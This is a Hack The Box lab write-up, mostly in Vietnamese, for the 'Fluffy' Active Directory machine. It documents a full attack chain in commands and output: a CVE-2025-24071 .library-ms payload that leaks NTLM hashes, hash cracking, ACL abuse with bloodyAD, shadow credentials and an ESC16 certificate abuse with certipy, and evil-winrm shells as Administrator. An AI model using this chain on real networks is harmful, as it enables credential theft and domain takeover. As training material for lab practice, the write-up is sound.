HTB Writeup: Fluffy
First AD machine has been solved - more knowledge.
HTB Writeup: Fluffy
Prepare
Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman:J0elTHEM4n1990!
Scanning Service with nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
binary@parrot > ~ > Desktop >
⚡ nmap -sV -Pn -sC 10.10.11.69 -oA nmap/fluffy
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 01:27 +07
Nmap scan report for 10.10.11.69
Host is up (0.048s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-17 01:02:07Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:29+00:00; +6h34m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:28+00:00; +6h34m06s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:29+00:00; +6h34m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:28+00:00; +6h34m06s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-09-17T01:02:50
|_ start_date: N/A
|_clock-skew: mean: 6h34m06s, deviation: 0s, median: 6h34m05s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.82 seconds
Từ kết quả của nmap ta có thể thấy rằng target đang mở các port sau:
1
2
3
4
5
6
7
8
9
10
53/tcp - DNS
139/tcp + 445/tcp = SMB Service
-------------------------------------
88/tcp - Kerberos<br>464/tcp - Kerberos Password Change
-------------------------------------
593/tcp - RPC
-------------------------------------
389/tcp - unencrypted LDAP
636/tcp - LDAP (SSL)
3268/tcp + 3269/tcp = Global Catalog LDAP (dùng để truy vấn thông tin trong Forest)
(Optional) Đầu tiên, ta hãy thêm hostname fluffy.htb vào /etc/hosts để có thể resolve domain từ IP
Machine có cho ta 1 credential để access vào target. Không có RDP protocol thì khả năng cao là credential của SMB (Server Message Block).
SMB Enumeration
Để enum SMB, ta có thể dùng smbclient hoặc smbmap (suggested) để liệt kê các folder/file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
binary@parrot > ~ > Desktop >
⚡ smbclient -L //10.10.11.69 -U 'FLUFFY\\j.fleischman%J0elTHEM4n1990!'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
binary@parrot > ~ > Desktop >
⚡ smbmap -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d 'fluffy.htb' -H 10.10.11.69
[+] IP: 10.10.11.69:445 Name: DC01.fluffy.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ, WRITE
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Lỗi NT_STATUS_RESOURCE_NAME_NOT_FOUND không đáng lo ngại lắm vì Server đã disable SMBv1 nên nó không thể xử lí connect đến được –> lỗi
Folder IT đang có permission là READ, WRITE –> Let’s access
1
2
3
4
5
6
7
8
9
10
11
12
13
14
binary@parrot > ~ > Desktop >
⚡ smbclient //10.10.11.69/IT -U 'FLUFFY\\j.fleischman'
Password for [j.fleischman]: J0elTHEM4n1990!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 19 21:27:02 2025
.. D 0 Mon May 19 21:27:02 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 22:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 22:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 22:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 22:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 21:31:07 2025
5842943 blocks of size 4096. 1521262 blocks available
Sau khi enum, ta có 2 software chính: KeePass 2.58 và Everything 1.4.1.1026gv và 1 file Update_Notice.pdf
Đọc file pdf ta thấy có 1 notice yêu cầu các admins upgrade system như sau:
Khả năng system đang chứa các lỗi này khá cao:
CVE-2025-24996 Critical NTLM
CVE-2025-24071 Critical NTLM
CVE-2025-46785 High Zoom
CVE-2025-29968 High AD CS
CVE-2025-21193 Medium AD
CVE-2025-3445 Low Zip file
Trong danh sách trên có duy nhất 1 vuln có PoC liên quan tới Windows Explorer leak NTLM hashes khi file malicious .library-ms được extracted từ ZIP achive.
1
2
3
4
5
6
7
8
9
10
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{args.ip_address}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
CVE 2025 24071 Exploit
Sử dụng script exploit để tạo file zip –> sau đó put lên smb, đợi chục giây cho auto extract giải nén là NTLM hash có sẽ bị Responder của ta bắt được
Sau khi exploit thành công ta nhận được NTLM hash leaked, Crack hash –> Password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
binary@parrot > ~ > Desktop > exploits > CVE-2025-24071_PoC
⚡ hashid hash.txt
--File 'hash.txt'--
Analyzing 'p.agila::FLUFFY:c21407215ee483dd:74A72319AB3B931190188E973376AB27:0101000000000000805E86893328DC014222E4B4A1BEB77D00000000020008003700590039004E0001001E00570049004E002D004C00420037003400550036004600510049003500500004003400570049004E002D004C0042003700340055003600460051004900350050002E003700590039004E002E004C004F00430041004C00030014003700590039004E002E004C004F00430041004C00050014003700590039004E002E004C004F00430041004C0007000800805E86893328DC0106000400020000000800300030000000000000000100000000200000C54D39AE29359CE4BA05D0FCE8F8B4C17819117F41D5FD5651E02263D2066C330A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100320035000000000000000000'
[+] NetNTLMv2
--End of file 'hash.txt'--
⚡ hashcat -m 5600 -a 0 hash.txt /home/binary/Desktop/rockyou.txt
hashcat (v6.2.6) starting
...
P.AGILA::FLUFFY:c21407215ee483dd:74a72319ab3b931190188e973376ab27:0101000000000000805e86893328dc014222e4b4a1beb77d00000000020008003700590039004e0001001e00570049004e002d004c00420037003400550036004600510049003500500004003400570049004e002d004c0042003700340055003600460051004900350050002e003700590039004e002e004c004f00430041004c00030014003700590039004e002e004c004f00430041004c00050014003700590039004e002e004c004f00430041004c0007000800805e86893328dc0106000400020000000800300030000000000000000100000000200000c54d39ae29359ce4ba05d0fce8f8b4c17819117f41d5fd5651e02263d2066c330a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100320035000000000000000000:prometheusx-303
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:c21407215ee483dd:74a72319ab3b931190...000000
Time.Started.....: Thu Sep 18 00:49:29 2025 (2 secs)
Time.Estimated...: Thu Sep 18 00:49:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/binary/Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2600.3 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4520448/14344384 (31.51%)
Rejected.........: 0/4520448 (0.00%)
Restore.Point....: 4515840/14344384 (31.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: prored -> priyankashah
Hardware.Mon.#1..: Util: 25%
Ok, như vậy ta được thêm 1 credential nữa là:
p.agila - prometheusx-303
j.fleischman - J0elTHEM4n1990!
AD Relationship Enumeration
Tiếp theo là enumerate các relationship, account, group, … trong môi trường AD bằng công cụ bloodhound.py –> extract ra file zip để feed cho Bloodhound CE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
binary@parrot > ~ > Desktop > more_tools > BloodHound.py
⚡ python3 bloodhound.py -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d 'fluffy.htb' -ns '10.10.11.69' -c 'All' --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::9691:a075:a64c:9a5e
INFO: Trying LDAP connection to dead:beef::9691:a075:a64c:9a5e
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::9691:a075:a64c:9a5e
INFO: Trying LDAP connection to dead:beef::9691:a075:a64c:9a5e
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250918215942_bloodhound.zip
Ta có thể thấy rằng chỉ có user P.Agila, J.Coffey là member của Service Account Manager nhưng hiện tại ta chỉ có credential của P.Agila thôi nên ta sẽ sử dụng nó để đi sâu hơn.
Service Account Managers lại có quyền “All” đến Service Accounts
Mà cái Service Accounts lại có quyền Write lên cả 3 service khác (SVC viết tắt của service), đó là: CA_SVC (Certificate Authorization), LDAP_SVC, WINRM_SVC (Win Remote)
Như vậy ta có thể logic hóa nó như sau:
Sơ đồ: (
P.AGILAmem ofService Account Managers) -A->Service Accounts-W->CA_SVC,LDAP_SVC,WINRM_SVC
=> Account P.Agila đang gián tiếp có quyền access vào các service kể trên. Để trực tiếp access vào thì ta cần tự add account P.Agila vào Service Accounts Group
Giải thích: Có 3 khái niệm bạn sẽ thấy phổ biến khi dùng BloodHound:
- MemberOf: Chỉ là quan hệ thành viên nhóm (A là thành viên của B)
- Inbound Object Control: Các đối tượng khác có quyền điều khiển A
- Outbound Object Control: A có quyền trên ACL (Access Control List) của B đủ để thao túng B (GenericAll, WriteDACL, WriteOwner, AddMember/WriteProperty vào thuộc tính member, AllExtendedRights…).
- ACL: là một tập hợp có thứ tự của các Access Control Entries (ACEs) được áp dụng trên một Object.
Privilege Escalation
Ta sẽ sử dụng bloodyAD (Tool này có thể được dùng để quản lí membership nhóm, chỉnh sửa ACL, thêm/đổi SPN, đặt lại mật khẩu user/service account, đọc ghi các thuộc tính liên quan nếu ACL cho phép mà không cần Powershell/WinRM/SMB thông qua LDAP)
1
2
3
binary@parrot > ~ > Desktop > more_tools > bloodyAD
⚡ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
Sau khi thêm P.Agila vào group Service Accounts thì ta cần đồng bộ hóa thời gian so với Target nếu không Kerberos sẽ từ chối authentication khi thâm nhập sâu hơn bằng cerity:
1
2
3
sudo ntpdate -u 10.10.11.69
2025-09-19 16:08:44.436920 (+0700) +23644.483927 +/- 0.025399 10.10.11.69 s1 no-leap
CLOCK: time stepped by 23644.483927
Certipy-AD là công cụ đánh giá AD CS (Active Directory Certificate Services) như phát hiện & khai thác các sai cấu hình CA/Template để leo thang quyền, đăng nhập bằng chứng chỉ (PKINIT/Schannel), bỏ qua MFA/lockout, và chiếm domain. Ở đây ta có thể sử dụng nó để sinh ra TGT/NT hash của WinRM_SVC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
binary@parrot > ~ > Desktop > more_tools
⚡ certipy shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a127884b-2ade-5bce-5f4d-1b89c0689e09'
[*] Adding Key Credential with device ID 'a127884b-2ade-5bce-5f4d-1b89c0689e09' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'a127884b-2ade-5bce-5f4d-1b89c0689e09' to the Key Credentials for 'winrm_svc'
/home/binary/Desktop/more_tools/certipy-ad/lib/python3.11/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn't positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography.
return x509.load_der_x509_certificate(certificate)
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
User Flag
Có NT hash rồi thì dùng nó để vô account winrm_svc thôi
1
2
3
4
5
6
7
8
9
10
11
⚡ evil-winrm -H 33bd09dcd697600edf6b3a7af4875767 -i 10.10.11.69 -u 'winrm_svc'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\Desktop\user.txt
<<REDACTED>>
Check thử xem có đọc được flag trong Administrator không
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\Administrator> dir
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
CA_SVC Vulnerability Exploit and Access to Administrator
Ta thấy rằng không có account nào trong ACL hay các user khác (mà ta đã biết) nằm trong Domain Admin nên ta cần phải leo lên tiếp.
Trong ACL, ta có quyền GeneralWrite với CA_SVC (Certificate Authority Service Account) account, check xem service CA_SVC này có bị misconfig không.
Đầu tiên, ta cần lấy NT hash của CA_SVC để authentication/authorization
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'CA_SVC' -dc-ip '10.10.11.69'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '189f69902f8b4f5e95f5795ceb14b6a9'
[*] Adding Key Credential with device ID '189f69902f8b4f5e95f5795ceb14b6a9' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '189f69902f8b4f5e95f5795ceb14b6a9' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
Sau khi có hash ta sẽ tìm vuln/misconfig trong CA_SVC bằng công cụ certipy-ad (lưu ý: Để certipy-ad hoạt động tốt thì cần update python lên version mới nhất 3.12.6 (tại thời điểm viết bài này) sau đó cài đặt certipy-ad)
Đây là mô tả chi tiết 16 lỗi của
CA_SVCgiúp ta có thể leo quyền: certipy-wiki
Khi sử dụng certipy, nó sẽ noti cho ta thấy rằngCA_SVCđang dính vuln nào
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.10.11.69
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250919220428_Certipy.txt'
[*] Wrote text output to '20250919220428_Certipy.txt'
[*] Saving JSON output to '20250919220428_Certipy.json'
[*] Wrote JSON output to '20250919220428_Certipy.json'
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ cat 20250919220428_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
Sau khi quét thì ta nhận thấy rằng CA_SVC đang dính lỗi ESC16, để khai thác nó thì trước tiên ta cần manipulate UPN thành target privileged account’s sAMAccountName (Update userPrincipalName –> Administrator)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-09-19T15:07:41+00:00
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-09-19T15:13:28+00:00
Sau khi sửa thành công UPN của ca_svc@fluffy.htb thành administrator, thì ta sẽ đến bước tiếp theo là Set the Kerberos credential cache environment variable và sau đó sẽ lấy certificate của Administrator:
1
2
3
4
5
6
7
---------------------------------
export KRB5CCNAME=victim.ccache
---------------------------------
certipy req \
-k -dc-ip '10.0.0.100' \
-target 'CA.CORP.LOCAL' -ca 'CORP-CA' \
-template 'User'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ export KRB5CCNAME=ca_svc.ccache
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy req -k -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 20
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Sau khi request certificate thành công, ta cần khôi phục UPN của ca_svc account sau đó lấy hash để authenticate vào target (administrator):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
Root Flag
Sau khi có NT hash (đoạn trước dấu “:” là LM hash -> Không có tác dụng lắm) thì sử dụng Evil-winrm để authen vào target và lụm flag thôi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ evil-winrm -H '8da83a3fa618b6e3a00e93f676c92a6e' -i '10.10.11.69' -u 'Administrator'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/19/2025 6:43 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
<<REDACTED>>
Done!
Happy hacking
This post is licensed under CC BY 4.0 by the author.